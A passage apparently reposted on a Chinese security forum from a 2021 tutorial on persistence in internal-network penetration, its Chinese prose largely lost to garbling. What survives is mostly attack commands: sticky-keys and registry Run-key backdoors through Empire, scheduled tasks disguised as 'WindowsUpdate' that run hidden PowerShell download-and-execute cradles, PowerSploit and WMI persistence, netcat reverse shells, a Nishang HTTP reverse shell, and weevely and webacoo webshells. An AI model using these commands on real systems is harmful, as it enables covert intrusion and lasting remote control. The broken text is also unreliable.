[17171] 2021-08-20_内网渗透基石篇——权限维持分析

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-08-20_内网渗透基石篇——权限维持分析 p o n y 6 8 6   F r e e B u f   2 0 2 1 - 0 8 - 2 0 t i 访 使   使 1 .   w i n d o w s 5 s h i f t w i n d o w s 使 c t r l + p c t r l + p   使 · c t r l + p s e r h c . e x e . b a k     w i n d o w s s y s t e m 3 2   s e t h c . e x e E m p i r e u s e m o d u l e l a t e r a l _ m o v e m n e t / i n v o k e _ w m i _ d e b u g g e r i n f o   使 i n f o 1 A d m i n i s t r a t o r c m d . e x e c m d . e x e s e t h c . e x e s e t   L i s t e n e r   t e s t x s e t   C o m p u t e r N a m e   W I N 7 - 6 4 . a d m i n . t e s t x s e t   T a r g e t B i n a r y   s e t h c . e x e s e t h c . e x e A d m i n i s t r a t o r
5 s h i f t 2 . 1 . 5 s h i f t 2   H K C U : S o f t w a r e M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n R u n ( ) K a l i W i n 7 a g e n t i n t e r a c t   t e s t x u s e m o d u l e   p e r s i s t e n c e / u s e r l a n d / r e g i s t r y s e t   N a m e   t e s t x s e t   R e g P a t h   H K C U : S o f t w a r e M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n R u n c m d . e x e
3 .   W i n d o w s   7   使 a t W i n d o w s   8   使 s c h t a s k s 使 . 1 . m e t s a p l o i t 使 M e t a s p l o i t p o w e r s h e l l   P a y l o a d   D e l i v e r y   2 . 3 . 访   s e s s i o n 4 . 2 . p o w e r s p l o i t 使 P o w e r S h e l l P o w e r S p l o i t P e r s i s t e n c e 使 S h u t t e r . p s 1 p a y l o a d   3 . E m p i r e 4 .   W M i W M I W M I P o w e r S h e l l W M I W M I   使   W M I   W M I P o w e r S h e l l I n v o k e - W M I s c h t a s k s   / C r e a t e   / t n   U p d a t e r   / t r   n o t e p a d . e x e   / s c   h o u r l y   / m o   1 s c h t a s k s   / d e l e t e   / t n   u p d a t e r 1 s c h t a s k s   / c r e a t e   / t n   W i n d o w s U p d a t e   / t r   " c : w i n d o w s s y s t e m 3 2 p o w e r s h e l l . e x e   - W i n d o w S t y l e   h i d d e n   - N o L o g o   - N o n I n t e r a c t i v e   - e p   b y p a s s   - n o p   - c   ' I E X   ( ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( " ( 2 ) s c h t a s k s   / c r e a t e   / t n   W i n d o w s U p d a t e   / t r   " c : w i n d o w s s y s t e m 3 2 p o w e r s h e l l . e x e   - W i n d o w S t y l e   h i d d e n   - N o L o g o   - N o n I n t e r a c t i v e   - e p   b y p a s s   - n o p   - c   ' I E X   ( ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( " ( 3 ) s c h t a s k s   / c r e a t e   / t n   W i n d o w s U p d a t e   / t r   " c : w i n d o w s s y s t e m 3 2 p o w e r s h e l l . e x e   - W i n d o w S t y l e   h i d d e n   - N o L o g o   - N o n I n t e r a c t i v e   - e p   b y p a s s   - n o p   - c   ' I E X   ( ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( " I m p o r t - M o d u l e   . P e r s i s t e n c e . p s m 1 P e r s i s t e n c e . p s 1 $ E l e v a t e d O p t i o n s   =   N e w - E l e v a t e d P e r s i s t e n c e O p t i o n   - S c h e d u l e d T a s k   - O n I d l e $ U s e r O p t i o n s   =   N e w - U s e r P e r s i s t e n c e O p t i o n   - S c h e d u l e d T a s k   - O n I d l e A d d - P e r s i s t e n c e   - F i l e P a t h   . / s h u t e e r . p s 1   - E l e v a t e d P e r s i s t e n c e O p t i o n   $ E l e v a t e d O p t i o n s   - U s e r P e r s i s t e n c e O p t i o n   $ U s e r O p t i o n s   - V e r b o s e u s e m o d u l e   p e r s i s t e n c e / e l e v a t e d / s c h t a s k s s e t   D a i l y T i m e   1 0 . 3 0 s e t   L i s t e n e r   t e s t e x e c u t e
W M I W M I W M I P o w e r S h e l l 使 E m p i r e I n v o k e - W M I W M I 1 . 2 . u s e m o d u l e   p e r s i s t e n c e / e l e v a t e d / w m i   r u n (   e x e c u t e ) 3 . w m i p o w e r s h e l l   C o m m a n d L i n e T e m l a t e   p o w e r s h e l l . e x e 4 .   w e b w e b w e b s h e l l a s p a s p . N E t   p h p j s p   I D S w e b 1 .   N I S h a n g w e b s h e l l N i s h a n g P o w e r S h e l l D N S P a y l a o d 广 N i s h a n g A S P X n i s h a n g A n t a k - W e b S h e l l 使 / s h e l l s h e l l s h e l l s h e l l & s h e l l n c   - l v p   2 3 3 3 3   - e   / b i n / s h n c   1 9 2 . 1 6 8 . 1 6 0 . 1 4 0   2 3 3 3 3 - - - - - - - s h e l l s h e l l s h e l l s h e l l G e t - W M I O b j e c t   - N a m e s p a c e   r o o t S u b s c r i p t i o n   - C l a s s   C o m m a n d L i n e E v e n t C o n s u m e r   - F i l t e r   N a m e = U p d a t e r
n c   - l v p   2 3 3 3 3 线 n c   1 9 2 . 1 6 8 . 1 6 0 . 1 4 0   2 3 3 3 3   - e   / b i n / s h w i n d o w s 7 t e s t x @ 1 9 2 . 1 6 8 . 1 6 0 . 1 3 5 w i n d o w s 7 t e s t x @ 1 9 2 . 1 6 8 . 1 6 0 . 1 3 9 p a y l o a d N i s h a n g w e b s h e l l A n t a k N i s h a n g a n t a k . a s p x I S S 访 a n t a k . a s p x N i s h a n g a n t a k D i s c l a i m e r N i s h a n g a n t a k F o r L e g i t U s e O n l y a p s x 使 a n t a k . a s p x w e b s h e l l h e l p l s d o w n l o a d u p l o a d   t h e   f i l e 2   w e e v e l y w e e v e l y P y t h o n P H P W e b S h e l l T C P   s h e l l R e v e r s e   S h e l l I m p o r t - M o d u l e   . n i s h a n g . p s m 1 I n v o k e - P o s h R a t H t t p   - I P A d d r e s s   1 9 2 . 1 6 8 . 1 6 0 . 1 3 5   - P o r t   1 0 1 0 1 p o w e r s h e l l . e x e   - W i n d o w S t y l e   h i d d e n   - E x e c u t i o n P o l i c y   B y p a s s   - n o l o g o   - n o p r o f i l e   - c   I E X   ( ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 1 6 0 . 1 3 5 : 1 0 1 0 1 / c o n n e c t ' ) )
H T T P 1 . 2 . 1 . 2 . 访 3 . 使 w e e v e l y 3 . w e b b a c o o P H P W e , k a l i w e e v e l y       [ c m d ] w e e v e l y   s e s s i o n     [ c m d ] w e e v e l y   g e n e r a t e     1 . w e e v e l y   g e n e r a t e   t e s t   / r o o t / / t e s t . p h p w e e v e l y   h t t p : / / 1 9 2 . 1 6 8 . 1 . 2 / t e s t / t e s t . p h p   t e s t   a u d i t _ p h p c o n f P H P   a u d i t _ s u i d s g i d S U I D S G I D   a u d i t _ f i l e s y s t e m   a u d i t _ e t c p a s s w d   s h e l l _ p h p P H P   s h e l l _ s h s h e l l   s h e l l _ s u s u   s y s t e m _ e x t e n s i o n s P H P W e b   s y s t e m _ i n f o   b a c k d o o r _ t c p T C P   s q l _ d u m p   s q l _ c o n s o l e S Q L   n e t _ i f c o n f i g   n e t _ p r o x y H T T P   n e t _ s c a n T C P   n e t _ c u r l H T T P   n e t _ p h p p r o x y P H P w e b a c o o ( W e b   B a c k d o o r   C o o k i e ) w e b a c o o   - h
w e b a c o o   - g   - o   / h o m e / x / x x . p h p p h p 使 使 退 访 w e b s h e l l , l o a d e x i t w e b a c o o   - t   - u   h t t p : / / 1 2 7 . 0 . 0 . 1 / t e s t . p h p

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则